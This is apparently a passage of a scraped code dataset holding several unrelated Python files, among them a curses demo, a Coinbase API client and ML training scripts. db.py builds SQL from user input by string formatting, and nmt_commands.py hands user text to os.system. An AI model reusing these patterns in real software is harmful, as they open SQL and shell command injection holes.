oxflower17\nimport numpy\nclass Dataset():\n def __init__(self):\n self._index_in_epoch = 0\n self._epochs_completed = 0\n def read_data(self):\n m=0\n n=0\n X, Y = oxflower17.load_data(one_hot=True)\n self.train_data = numpy.zeros([935,224,224,3],dtype=\"float32\")\n self.train_label = numpy.zeros([935,17],dtype=\"float32\")\n self.validate_data = numpy.zeros([425,224,224,3],dtype=\"float32\")\n self.validate_label = numpy.zeros([425,17],dtype=\"float32\")\n\n for i in range(0,1360):\n if i % 80 < 55:\n numpy.copyto(self.train_data[m],X[i])\n numpy.copyto(self.train_label[m],Y[i])\n m += 1\n else:\n self.validate_data[n] = numpy.copy(X[i])\n self.validate_label[n] = numpy.copy(Y[i])\n n += 1\n self._num_examples = self.train_data.shape[0]\n return self.train_data,self.train_label,self.validate_data,self.validate_label\n\n def next_batch(self,batch_size):\n start = self._index_in_epoch\n self._index_in_epoch += batch_size\n if self._index_in_epoch > self._num_examples:\n # Finished epoch\n self._epochs_completed += 1\n # Shuffle the data\n perm = numpy.arange(self._num_examples,dtype=\"int32\")\n numpy.random.shuffle(perm)\n self.train_data = self.train_data[perm]\n self.train_label = self.train_label[perm]\n start = 0\n self._index_in_epoch = batch_size\n assert batch_size <= self._num_examples\n end = self._index_in_epoch\n return self.train_data[start:end],self.train_label[start:end]\n\n\n","sub_path":"oxflowers_16M/oxflower17.py","file_name":"oxflower17.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"386361479","text":"#!/usr/bin/python3\n\nimport os\nfrom subprocess import Popen\nimport re\n\nclass Commands:\n def __init__(self):\n self.erase_history = False\n self.use_async = False\n self.print_to_screen = False\n\n self.url_search = 'https://www.google.com/search?q='\n self.url_youtube = 'https://www.youtube.com/results?search_query='\n self.launch_google_chrome = 'google-chrome --app='\n self.launch_firefox = 'firefox --search '\n self.launch_rhythmbox = 'rhythmbox '\n self.launch_mail = 'thunderbird'\n self.launch_office = 'libreoffice'\n self.launch_file = 'nautilus'\n self.launch_terminal = 'gnome-terminal'\n\n self.text_commands = {\n 'play': 'any',\n 'media': 'any',\n 'google': 'search',\n 'search': 'search',\n 'song': 'music',\n 'video': 'video',\n 'movie': 'video',\n 'music': 'music',\n 'youtube': 'video',\n 'mail': 'mail',\n 'letter':'mail',\n 'letters':'mail',\n 'email': 'mail',\n 'emails':'mail',\n 'thunderbird':'mail',\n 'office': 'office',\n 'libreoffice': 'office',\n 'file':'file',\n 'files': 'file',\n 'directory': 'file',\n 'directories': 'file',\n 'terminal': 'terminal',\n 'firefox': 'firefox'\n }\n\n self.command_dict = {\n 'search': self.launch_google_chrome + self.url_search,\n 'video': self.launch_google_chrome + self.url_youtube,\n 'music': self.launch_rhythmbox,\n 'mail': self.launch_mail,\n 'office': self.launch_office,\n 'file': self.launch_file,\n 'terminal': self.launch_terminal,\n 'firefox': self.launch_firefox\n }\n self.command_string = ''\n\n self.p = None\n\n def re(self,i):\n return re.sub('[.?!:;,]','', i)\n\n def is_command(self,i):\n i = self.re(i)\n output = False\n for x in i.split():\n for xx in self.text_commands:\n if x.strip().lower() == xx.strip().lower():\n output = True\n return output\n\n def strip_command(self,i):\n i = self.re(i)\n i = i.split()\n ii = i[:]\n for x in i:\n for xx in self.text_commands:\n if x.strip().lower() == xx.strip().lower():\n ii.remove(x)\n return ii\n\n\n def decide_commmand(self,i):\n i = self.re(i)\n chosen = {}\n any = False\n for xx in self.text_commands.values():\n if self.print_to_screen: print(xx,'xx')\n chosen[xx] = 0\n output = False\n i = i.split()\n ii = i[:]\n if self.print_to_screen:\n print(self.text_commands)\n print(chosen)\n for x in i:\n for xx in self.text_commands:\n\n if x.strip().lower() == xx.strip().lower() : #and x.strip().lower() in self.text_commands:\n output = True\n if self.text_commands[xx] in chosen:\n chosen[self.text_commands[xx]] += 1\n ii.remove(x)\n if self.print_to_screen: print(chosen[self.text_commands[xx]], xx, x)\n i = ii\n #if self.print_to_screen: print(chosen)\n if self.command_string == '':\n\n high = 0\n old_high = 0\n for x in chosen:\n high = chosen[x]\n if high > old_high and x != 'any':\n self.command_string = self.command_dict[x]\n old_high = high\n elif high > old_high and x == 'any':\n any = True\n\n if self.print_to_screen: print(chosen)\n\n if self.command_string == '' and any is True:\n self.command_string = self.command_dict['search']\n\n if (\n self.command_string == self.command_dict['video'] or\n self.command_string == self.command_dict['search'] or\n self.command_string == self.command_dict['firefox']\n ):\n self.command_string += '+'.join(i)\n return output\n\n def do_command(self, i):\n erase = False\n self.command_string = ''\n if isinstance(i,list): i = ' '.join(i)\n i = self.re(i)\n\n #if len(self.command_string) == 0:\n self.decide_commmand(i)\n\n if self.print_to_screen: print(self.command_string)\n\n if not self.use_async:\n self.launch_sync(self.command_string)\n else:\n self.launch_async(self.command_string)\n\n if self.erase_history:\n erase = True\n return erase\n\n def launch_sync(self,i):\n ## if the program doesn't exist, this command will fail but chatbot will continue.\n os.system(i)\n pass\n\n def launch_async(self, i):\n i = i.split()\n self.p = Popen(i)\n pass\n\nif __name__ == '__main__':\n c = Commands()\n command1 = 'play media'\n command2 = 'play music like video music like a movie of the music band youtube.'\n c.print_to_screen = True\n z = c.is_command(command1)\n for x in range(2):\n if len(c.strip_command(command1)) > 0:\n #command = c.strip_command(command)\n print(command1, x, 'here1')\n c.do_command(command1)\n exit()\n elif x is 1:\n #command = c.strip_command(command)\n print(command2, x, 'here2')\n c.do_command(command2)\n print('use previous command also.')\n pass\n","sub_path":"model/nmt_commands.py","file_name":"nmt_commands.py","file_ext":"py","file_size_in_byte":5663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"598897455","text":"def find(a,b):\r\n s=a+b\r\n p=a*b\r\n r=a/b\r\n return s,p,r\r\na=int(input(\"Enter First No. : \"))\r\nb=int(input(\"Enter Second No. : \"))\r\ns,p,r=find(a,b)\r\nprint(s)\r\nprint(p)\r\nprint(r)\r\n","sub_path":"a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309554485","text":"#!/usr/bin/env python\n \nimport curses\nimport curses.textpad\nimport curses.panel\n# import time\n\ndef main(stdscr):\n \"\"\"\n \"\"\"\n curses.curs_set(0)\n\n stdscr.border() # Draw border\n \n def row(set=-1, r=[0]): # A typle of overload\n \"\"\"\n \"\"\"\n if set == -1:\n r[0] = r[0] + 1\n elif set > -1:\n r[0] = set\n return r[0]\n\n # Text attributes\n stdscr.addstr(row(),1, 'ALTCHARSET', curses.A_ALTCHARSET)\n stdscr.addstr(row(),1, 'BLINK', curses.A_BLINK) # no working\n stdscr.addstr(row(),1, 'BLOD', curses.A_BOLD)\n stdscr.addstr(row(),1, 'DIM', curses.A_DIM) # no working\n stdscr.addstr(row(),1, 'NORMAL', curses.A_NORMAL)\n stdscr.addstr(row(),1, 'REVERSE', curses.A_REVERSE)\n stdscr.addstr(row(),1, 'STANDOUT', curses.A_STANDOUT) # same as REVERSE\n stdscr.addstr(row(),1, 'UNDERLINE', curses.A_UNDERLINE)\n\n # Font frontground and background color. Color is brighter on BOLD, and black BLOD is gray. \n col = (curses.COLOR_BLACK,\n curses.COLOR_RED,\n curses.COLOR_GREEN,\n curses.COLOR_YELLOW,\n curses.COLOR_BLUE,\n curses.COLOR_MAGENTA,\n curses.COLOR_CYAN,\n curses.COLOR_WHITE)\n r = row()\n for color in col:\n curses.init_pair(color+1, color, 0)\n stdscr.addstr(r,1+color*2, 'HI', curses.color_pair(color+1) | curses.A_BOLD)\n\n r = row()\n for color in col:\n stdscr.addstr(r,1+color*2, 'HI', curses.color_pair(color+1))\n\n # The only way to set bright backgound color\n r = row()\n for color in col:\n stdscr.addstr(r,1+color*2, ' ', curses.color_pair(color+1) | curses.A_BOLD | curses.A_REVERSE)\n\n r = row()\n for color in col:\n stdscr.addstr(r, 1+color*2, ' ', curses.color_pair(color+1) | curses.A_REVERSE)\n\n stdscr.move(15, 1)\n for acs in (curses.ACS_BLOCK,\n curses.ACS_BOARD,\n curses.ACS_BTEE,\n curses.ACS_BULLET,\n curses.ACS_CKBOARD,\n curses.ACS_DARROW,\n curses.ACS_DEGREE,\n curses.ACS_DIAMOND,\n curses.ACS_GEQUAL,\n curses.ACS_HLINE,\n curses.ACS_LANTERN,\n curses.ACS_LARROW,\n curses.ACS_LEQUAL,\n curses.ACS_LLCORNER,\n curses.ACS_LRCORNER,\n curses.ACS_LTEE,\n curses.ACS_NEQUAL,\n curses.ACS_PI,\n curses.ACS_PLMINUS,\n curses.ACS_PLUS,\n curses.ACS_RARROW,\n curses.ACS_RTEE,\n curses.ACS_S1,\n curses.ACS_S3,\n curses.ACS_S7,\n curses.ACS_S9,\n curses.ACS_STERLING,\n curses.ACS_TTEE,\n curses.ACS_UARROW,\n curses.ACS_ULCORNER,\n curses.ACS_URCORNER,\n curses.ACS_VLINE):\n stdscr.addch(acs)\n stdscr.addch(' ')\n\n # Set attribute for following write\n stdscr.attrset(curses.A_UNDERLINE)\n stdscr.addstr(row(16),1, \"BLOD\", curses.A_BOLD)\n stdscr.addstr(row(),1, \"UNDERLINE\")\n stdscr.attroff(curses.A_UNDERLINE)\n stdscr.addstr(row(),1, \"NONE\")\n\n stdscr.hline(curses.ACS_HLINE, 10) # insert line of ch\n stdscr.chgat(18,2, 1, curses.color_pair(2)) # Set character attribute.\n stdscr.insstr('*') # insert ch\n stdscr.instr() # get a string\n stdscr.vline(curses.ACS_VLINE, 3) # insert line of ch\n\n\n # stdscr.clear() # clear window.\n # stdscr.clrtobot() # Erase from cursor to the end of window.\n # stdscr.clrtoeol() # Erase from cursor to the end of the line.\n # stdscr.delch() # Delete any character at (y, x).\n # stdscr.deleteln() # Delete the line under the cursor.\n # stdscr.getbegyx() # Return a tuple (y, x) of co-ordinates of upper-left corner.\n # stdscr.getmaxyx() # Return a tuple (y, x) of the height and width of the window.\n # stdscr.is_wintouched() # Return True if the specified window was modified since the last call to refresh().\n\n # stdscr.addstr(\"{}\\n\".format(repr(col)))\n\n win = curses.newwin(4,5,1,30)\n win.border()\n sbwin = win.subwin(2,30) # Create a sub-window\n sbwin.border(0, 0, 0, 0, curses.ACS_LTEE, curses.ACS_RTEE, 0, 0)\n pad = curses.newpad(100, 100)\n pad.border()\n bgray = curses.A_REVERSE \n pad.bkgd(' ', bgray) # set background, default to all string\n # These loops fill the pad with letters; this is\n # explained in the next section\n for y in range(0, 100):\n for x in range(0, 100):\n try:\n pad.addch(y,x, ord('a') + (x*x+y*y) % 26)\n except curses.error:\n pass\n\n # Displays a section of the pad in the middle of the screen\n # stdscr.refresh()\n # win.refresh()\n\n textwin = curses.newwin(1, 8, 20, 20)\n textwin.bkgd(' ', curses.A_UNDERLINE)\n tb = curses.textpad.Textbox(textwin)\n\n w2 = curses.newwin(5,5, 1,40)\n w2.border()\n\n p1 = curses.panel.new_panel(stdscr)\n p2 = curses.panel.new_panel(w2)\n p3 = curses.panel.new_panel(win)\n # p4 = curses.panel.new_panel(pad)\n\n curses.panel.update_panels()\n curses.doupdate()\n # pad.refresh(20,20, 5,35, 10,40)\n\n\n while True:\n ch = stdscr.getch()\n if ch == ord('q'): break\n elif ch == curses.KEY_RIGHT:\n y = win.getbegyx()[0]\n x = win.getbegyx()[1] + 1\n if x < stdscr.getmaxyx()[1]-win.getmaxyx()[1]:\n win.mvwin(y, x)\n stdscr.redrawwin() \n curses.panel.update_panels()\n curses.doupdate()\n pad.refresh(20,20, 5,35, 10,40)\n elif ch == curses.KEY_LEFT:\n yx = list(win.getbegyx())\n yx[1] -= 1\n if yx[1] > 0:\n win.mvwin(*yx)\n stdscr.redrawwin() \n curses.panel.update_panels()\n curses.doupdate()\n pad.refresh(20,20, 5,35, 10,40)\n elif ch == ord('e'):\n curses.curs_set(2)\n text = tb.edit()\n sbwin.addstr(1,1, text)\n sbwin.refresh()\n curses.curs_set(0)\n\ncurses.wrapper(main)\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"182592677","text":"### Main file for the training/predition of the LSTM and Temporal net over the trajectories dataset.\n\nimport argparse\nimport shutil\nimport numpy as np\nimport time\n\nfrom ball_3d_coordinates.traj_flying_experiments.preprocessing.data_preprocessing_traj import TmpTrajPreprocessor\nfrom ball_3d_coordinates.traj_flying_experiments.preprocessing.exploration import Visualizer\nfrom ball_3d_coordinates.traj_flying_experiments.preprocessing.data_loader_traj import Loader\nfrom ball_3d_coordinates.traj_flying_experiments.models.tmp_net_traj import TmpTrajNet\nfrom ball_3d_coordinates.traj_flying_experiments.models.lstm_traj import LSTMTrajNet\n\nparser = argparse.ArgumentParser()\n\n\"\"\" General Parameters \"\"\"\nparser.add_argument('--restore', type=bool, default=False, \n help='if True restore the model from --model_path.')\nparser.add_argument('--train', type=bool, default=False, \n help='if True train the model.')\nparser.add_argument('--tune', type=bool, default=False, \n help='if True tune the model.')\nparser.add_argument('--test', type=bool, default=False, \n help='if True test the model.')\n\n\"\"\" Model Parameters \"\"\"\nparser.add_argument('--log_dir', type=str, default='./tensorbaord', \n help='directory where to store tensorbaord values.')\nparser.add_argument('--epochs', type=int, default=1000, \n help='number of batch iterations.')\nparser.add_argument('--batch_size', type=int, default=100, \n help='number of samples in the training batch.')\nparser.add_argument('--input_trace', type=int, default=25, \n help='dimension of the trace to take into account.')\nparser.add_argument('--noise', type=bool, default=False, \n help='if True, a noise is applied to the features.')\n\nargs = parser.parse_args()\n\ndef main():\n\n # Remove tensorboard folder.\n try:\n shutil.rmtree('./tensorbaord')\n except FileNotFoundError:\n pass\n\n # Fix the seed\n np.random.seed(0)\n \n # Load the data\n loader = Loader()\n X, y = loader.load_data()\n\n # Explore data\n Visualizer.get_statistics(X, y)\n\n # Preprocess the data\n preprocessor = TmpTrajPreprocessor(input_trace=args.input_trace)\n X_train, y_train, X_test, y_test, X_val, y_val = preprocessor.fit_transform(X, y, noise=args.noise)\n\n print(X_train.shape)\n print(X_test.shape)\n print(X_val.shape)\n\n # Define the Model\n model = TmpTrajNet(\n input_trace=args.input_trace,\n batch_size=args.batch_size,\n epochs=args.epochs,\n log_dir=args.log_dir\n )\n\n # Restore the model\n if args.restore == True:\n model.restore()\n\n # Train the model\n if args.train == True:\n print(\"Starting training...\")\n history = model.fit(X_train, y_train, X_test, y_test)\n print(\"Finished training...\")\n\n # Tune the model\n if args.tune == True:\n print(\"Starting tuning...\")\n model.tune(X_train, y_train)\n print(\"Finished tuning...\")\n\n # Test the model\n if args.test == True:\n print(\"Starting testing...\")\n loss, metric = model.evaluate(X_test, y_test)\n print(\"Finished testing...\")\n print(\"LOSS: \", loss)\n print(\"MAE: \", metric)\n \n # Measuring Prediction Time\n sample = np.reshape(X_train[0], (1, 25, 3))\n start = time.clock()\n model.predict(sample)\n print(time.clock() - start)\n\n return\n\nmain()","sub_path":"main_traj_synthetic.py","file_name":"main_traj_synthetic.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237115963","text":"###########################################################################\n# This the database file for connecting to #\n# database. PostgresSQL is being used along with #\n# #\n# psycopg2: python module for interacting with #\n# PostgresSQL #\n# #\n# Database Schema: #\n# Databse Name: search_history #\n# ---------------------------------------------------------------------- #\n# |(user_id varchar(256) | keyword varchar(256) | search_time timestamp)| #\n# ---------------------------------------------------------------------- #\n###########################################################################\n\nimport psycopg2\nimport os\nfrom dotenv import load_dotenv\nfrom datetime import datetime\n\nload_dotenv() # loads values from env file\n\nDATABASE_URL = os.environ['DATABASE_URL']\n\ndef create_db_connection():\n conn = psycopg2.connect(host='ec2-34-204-121-199.compute-1.amazonaws.com',\n port=5432,\n user=os.getenv('DB_USER'),\n password=os.getenv('DB_PASS'),\n database='dfgi7dou33g0p5',\n sslmode='allow'\n )\n return conn\n\n\ndef post_search_data(user_id, keyword):\n connection = create_db_connection()\n sql_cursor = connection.cursor()\n\n # adding timestamp so that I can get same query saved to the database\n sql_cursor.execute(\"INSERT INTO public.search_history VALUES('{}', '{}', '{}')\".format(\n user_id, keyword, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\n connection.commit()\n connection.close()\n\n\ndef get_search_data(user_id, keyword):\n connection = create_db_connection()\n sql_cursor = connection.cursor()\n\n # getting search history for the keyword\n sql_cursor.execute(\n \"SELECT * FROM public.search_history WHERE user_id = '{}' AND keyword LIKE '%\".format(user_id) + keyword + \"%'\")\n\n results = sql_cursor.fetchall()\n connection.close()\n\n return results\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"252478238","text":"def binarySearch(array, target):\n # Write your code here.\n left = 0\n right = len(array)-1\n mid = 0\n while left <= right:\n mid = (left + right)//2\n match = array[mid]\n if match == target:\n return mid\n elif target < match:\n right = mid-1\n else:\n left = mid+1\n return -1\n","sub_path":"AlgoExpert/binarySearch/itaretive.py","file_name":"itaretive.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"49622072","text":"from django.db import models\nfrom django.contrib.admin.filterspecs import FilterSpec, ChoicesFilterSpec\nfrom django.utils.encoding import smart_unicode\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.sites.models import Site\n\nclass MultiSitesFilterSpec(FilterSpec):\n\tdef __init__(self, f, request, params, model, model_admin):\n\t\tsuper(MultiSitesFilterSpec, self).__init__(f, request, params, model, model_admin)\n\t\tself.lookup_val = request.GET.get(f.name, None)\n\t\tself.lookup_choices = Site.objects.all()\n\n\tdef title(self):\n\t\treturn \"sites\"\n\t\t\n\tdef choices(self, cl):\n\t\tyield {'selected': self.lookup_val is None,\n\t\t\t\t'query_string': cl.get_query_string({}, [self.field.name]),\n\t\t\t\t'display': _('All')}\n\n\t\tfor site in self.lookup_choices:\n\t\t\tyield {'selected': self.lookup_val == site,\n\t\t\t\t\t'query_string': cl.get_query_string({'sites__id': site.id}),\n\t\t\t\t\t'display': site}\n","sub_path":"admin/filterspecs.py","file_name":"filterspecs.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"584666676","text":"import math\n\nmonth_dict = {\n 1: 31,\n 2: 28,\n 3: 31,\n 4: 30,\n 5: 31,\n 6: 30,\n 7: 31,\n 8: 31,\n 9: 30,\n 10: 31,\n 11: 30,\n 12: 31\n}\nsundaysCount = 0\ndayofweek = 2\nday = 1\nyear = 1901\nmonth = 1\nleap = False\n\nwhile year < 2001:\n\n if day == 1 and dayofweek == 7:\n sundaysCount += 1\n\n day += 1\n dayofweek += 1\n\n if dayofweek > 7:\n dayofweek = 1\n if leap and month == 2:\n if day > month_dict[month] + 1:\n day = 1\n month += 1\n else:\n if day > month_dict[month]:\n day = 1\n month += 1\n\n if month > 12:\n year += 1\n month = 1\n if year % 4 == 0:\n leap = True\n else:\n leap = False\n\n # iterate everything\n # iterate day, day of the week\n # if day greater than month day, iterate month and day back to 1\n # if leapyear andmonth 2 add 1 to total\n # if month is 12 then iterate year and month = 1 day = 1\n\n\nprint(sundaysCount)\n","sub_path":"python/p19.py","file_name":"p19.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"332823057","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport json\nfrom Public.ReadConfig import ReadConfig\n\nproDir = os.path.split(os.path.realpath(__file__))[0]\n#将path分割成路径名和文件名\ndata_path = os.path.join(proDir, \"data.json\")\n\n\ndef generate_test_data(devices):\n dict_tmp = {}\n for d in devices:\n print(devices.index(d))\n dict_tmp[d['serial']] = {}\n dict_tmp[d['serial']]['user_name'] = ReadConfig().get_testdata('user_name')[devices.index(d)]\n dict_tmp[d['serial']]['password'] = ReadConfig().get_testdata('password')[devices.index(d)]\n dict_tmp[d['serial']]['message'] = ReadConfig().get_message('message')[devices.index(d)]\n dict_tmp[d['serial']]['num'] = ReadConfig().get_num('num')[devices.index(d)]\n print(dict_tmp)\n print(os.path.abspath('.'))\n with open(data_path, \"w\") as f:\n json.dump(dict_tmp, f)\n f.close()\n print(\"测试数据data.js创建完成\")\ndef get_test_data(d):\n with open(data_path, 'r') as f:\n data = json.load(f)\n return data[d.device_info['serial']]","sub_path":"Public/TestData.py","file_name":"TestData.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"159329655","text":"from django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User\nfrom mysite.envconfig import get_judge_pw\n\nimport csv\nimport os\n\n\ndef readOneFile(fpath):\n with open(fpath) as f:\n reader = csv.DictReader(f)\n for line in reader:\n un = line[\"username\"].strip()\n if not un:\n raise ValueError(\"Empty username. Either edit the judgeData.csv directly, or use the makeUsernames command.\")\n if User.objects.filter(username=un).exists():\n raise ValueError(\"username already exists: {}\".format(un))\n \n dat = {\n \"username\": un,\n \"first_name\": line[\"first_name\"].strip(),\n \"last_name\": line[\"last_name\"].strip(),\n \"password\": get_judge_pw(un)\n }\n \n User.objects.create_user(**dat)\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n readOneFile(os.path.join(\"miscdata\", \"judgeData.csv\"))\n ","sub_path":"steamify/management/commands/importjudges.py","file_name":"importjudges.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"473816840","text":"'''\nAccount class: any member variables and functions related to a\nbitcoin account will go here\n'''\nimport json\nimport requests\nfrom coinbasewalletauth import CoinbaseWalletAuth\n\nclass Account():\n def __init__(self):\n # initialize generic api url\n self.api_url = \"https://api.coinbase.com/v2/\"\n\n # initial setup on instantiation\n auth = CoinbaseWalletAuth() # call authentication class\n req = requests.get(self.api_url + 'accounts', auth=auth)\n output = dict(req.json())\n\n # initial setup\n self.acct_id = output['data'][0]['id'] \n self.acct_name = output['data'][0]['name']\n self.acct_balance = 0\n self.acct_last_trans_amt = []\n self.acct_last_trans_price = 0\n\n # this is where member variables will go\n\n # retrieve account name\n def get_acct_name(self):\n return self.acct_name\n\n # add acct id function here\n def get_acct_id(self):\n return self.acct_id\n\n def get_acct_balance(self):\n # get current balance in this form (balance, currency_type)\n # the variables in the tuple above are string types\n auth = CoinbaseWalletAuth()\n\n req = requests.get(self.api_url + 'accounts', auth=auth)\n output = dict(req.json())\n\n curr_amount = output['data'][0]['balance']['amount']\n curr_type = output['data'][0]['balance']['currency']\n\n self.acct_balance = curr_amount\n\n return self.acct_balance, curr_type\n\n def get_acct_transactions(self):\n account_id = self.get_acct_id()\n auth = CoinbaseWalletAuth()\n request_transaction = requests.get(self.api_url + \\\n 'accounts/' + \\\n account_id + \\\n '/transactions', auth=auth).json()\n output = dict(request_transaction)\n\n i = 0\n trans_list = []\n for i in range(5):\n trans_list.append(output['data'][i])\n\n self.acct_last_trans_price.append(output['data'][0]['amount']['amount'])\n self.acct_last_trans_price.append(output['data'][0]['amount']['currency'])\n self.acct_last_trans_price.append(output['data'][0]['native_amount']['amount'])\n self.acct_last_trans_price.append(output['data'][0]['native_amount']['currency'])\n\n return trans_list\n\n # returns a list containing 2 k,v pairs for amount and native amt as keys\n def get_last_trans_amt(self):\n return self.acct_last_trans_amt\n\n def get_last_trans_price(self):\n return self.acct_last_trans_price\n\n","sub_path":"src/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"510143796","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport sys\nimport yaml\nimport matplotlib.pyplot as plt\n\nimport os\nimport traceback\n\n\n\ndef read_estimation_robot(test_number, est_type):\n\t# read estimation from robot\n\n\tdata = np.genfromtxt(\"./\" + test_number + \"/\"+ est_type + \"_data\" + test_number + \".txt\", delimiter = \",\", skip_header=1)\n\n\tdata = data[:, [0, 2, 4, 7]] # est_time, stamp_time, d, phi\n\t#print(data[0,0]- data[1,1])\n\n\tt_est = data[:,1] / 1e9\n\tdelay = data[:,0] - data[:,1]\n\td = data[:,2]\n\tphi_est = data[:,3]\n\n\treturn(t_est, phi_est)\n\n###\n\ndef read_truth_localization(test_number):\n\n\twith open(\"./\"+test_number+\"/autobot06.yaml\", 'r') as stream:\n\n\n\t\tdata = yaml.safe_load(stream)\n\n\n\t\ttimestart = data['begin_time_stamp']\n\t\tdata_points = len(data['trajectory_data'])\n\t\t\n\t\tx = np.zeros((data_points,))\n\t\ty= np.zeros((data_points,))\n\t\tR = np.zeros((3,3, data_points)) \n\t\tphi = np.zeros((3, data_points))\n\n\t\tdx = 999.999*np.ones((data_points, ))\n\t\tdy = 999.999*np.ones((data_points, ))\n\t\tdr = 999.999*np.ones((data_points, ))\n\t\tdphi = 999.999*np.ones((data_points, ))\n\n\t\tfinal_trajectory = []\n\t\tsave_time_stamps = np.zeros((0,1))\n\t\t#print(data['trajectory_data'].items())\n\t\tfor idx, [time, traj] in enumerate(data['trajectory_data'].items()):\n\t\t\tx[idx] = np.array(traj[0])\n\t\t\ty[idx] = np.array(traj[1])\n\t\t\t\n\t\t\tsave_time_stamps = np.append(save_time_stamps, time)\n\t\t\t#print(time)\n\t\t\t\n\t\t\tR[:,:,idx] = np.reshape(np.array(traj[3:]), (3,3))\n\t\t\tphi[:,idx] = np.array([np.arctan2(-R[1,2,idx],R[2,2,idx]), \n\t\t\t\t\t\t\t\tnp.arctan2(R[0,2,idx],np.sqrt(R[0,0,idx]**2 + R[0,1,idx]**2)),\n\t\t\t\t\t\t\t\tnp.arctan2(-R[0,1,idx], R[0,0,idx])])\n\t\t\t\n\t\t\tz = phi[2,idx]\n\t\t\t#print(timestart.keys())\n\t\t\tpoints = np.array([x[idx], y[idx]])\n\t\t\tfinal_trajectory.append([points, z])\n\t\tfinal_array = final_trajectory\n\t\t\n\n\n\tx_true = np.zeros((0,1))\n\ty_true = np.zeros((0,1))\n\talpha_true = np.zeros((0,1))\n\tt_true = np.zeros((0,1))\n\n\tfor entry in range(0, len(final_array)):\n\t\tx = (final_array[entry][0][0] ) #-2.2\n\t\ty = final_array[entry][0][1] #+ 0.8\n\t\talpha = final_array[entry][1]\n\n\n\t\tx_true = np.append(x_true, x)\n\t\ty_true = np.append(y_true, y)\n\t\talpha_true = np.append(alpha_true, alpha)\n\t\tt_true = np.append(t_true, save_time_stamps[entry])\n\t\t#print(\"%s %s %s %s %s\" %(x,y,alpha, entry, save_time_stamps[entry]))\n\t\t\n\n\t#copy from notebook\n\n\treturn(t_true, timestart, x_true, y_true, alpha_true)\n\n\ndef write_to_file(test_number, est_type, mean, stdev):\n\tf = open(\"./evaluation_results.txt\", \"a\")\n\tf.write(str(test_number)+ \",\" + est_type + \",\" + str(mean) + \",\" + str(stdev)+\"\\n\")\n\n\tf.close()\n\treturn\n\n\ndef evaluate_estimation(phi_est, t_est, t_all, t_0, x, y, alpha, est_type):\n\n\ta=0.6\n\tb=2.1 #1.185\n\tphi_true = np.zeros((0,1))\n\tt_true = np.zeros((0,1))\n\tt_plot = np.zeros((0,1))\n\tmean_stdev = np.zeros((0,3))\n\tk =0\n\n\n\tfor i in range(len(t_all)):\n\n\t\tif x[i] > 1.6 and y[i] > a and y[i] < b:\n\t\t\talpha[i] -= np.sign(alpha[i]) * np.pi/2\n\n\t\t\n\t\t\tphi_true = np.append(phi_true, alpha[i])\n\t\t\tt_true = np.append(t_true, float(t_all[i]) + t_0)\n\t\t\tt_plot = np.append(t_plot, float(t_all[i]))\n\n\ti = 1\n\tprint(len(t_true))\n\twhile i < len(t_true)-2:\n\t\tphi_true[i] = 0.25 * phi_true[i-1] + 0.5 * phi_true[i] + 0.25 *phi_true[i+1]\n\t\t#phi_true[i] = (phi_true[i-1] +phi_true[i] + phi_true[i+1])/3\n\t\ti+=1\n\t#error = phi_true\n\t#plt.plot(t_true -t_true[0], phi_true, xlabel = \"a\")\n\t# plt.set_xlabel('time [s]')\n\t# plt.set_ylabel('phi_localization [rad]')\n\t#plt.savefig(\"./phi_true_push-line.png\")\n\t#print(len(phi_true))\n\n\n\tu=0\n\tphi_comp = np.zeros((0,1))\n\ti =0\n\twhile i < len(t_true):\n\t\tif i < len(t_true) -1:\n\n\t\t\twhile abs(phi_true[i+1] - phi_true[i]) > 0.1:\n\t\t\t\tprint(\"delete\", t_true[i+1]-t_true[0], phi_true[i+1])\n\t\t\t\tt_true = np.delete(t_true, i+1)\n\t\t\t\tphi_true = np.delete(phi_true, i+1)\n\n\n\t\t\tif t_true[i+1] - t_true[i] > 0.5:\n\t\t\t\tt_true = np.insert(t_true, i+1, 0.5 * (t_true[i+1] + t_true[i]))\n\t\t\t\tphi_true = np.insert(phi_true, i+1, 0.5 * (phi_true[i+1] + phi_true[i]))\n\t\n\t\tif t_true[i] < t_est[u]:\n\t\t\tphi_comp = np.append(phi_comp, (phi_est[u] - phi_est[u-1]) / (t_est[u] - t_est[u-1]) * (t_true[i] - t_est[u-1]) + phi_est[u-1])\n\t\t\tp = (phi_est[u] - phi_est[u-1]) / (t_est[u] - t_est[u-1]) * (t_true[i] - t_est[u-1]) + phi_est[u-1]\n\t\t\ti += 1\n\t\t\n\t\telse:\n\t\t\tu += 1\n\n\terror = phi_comp - 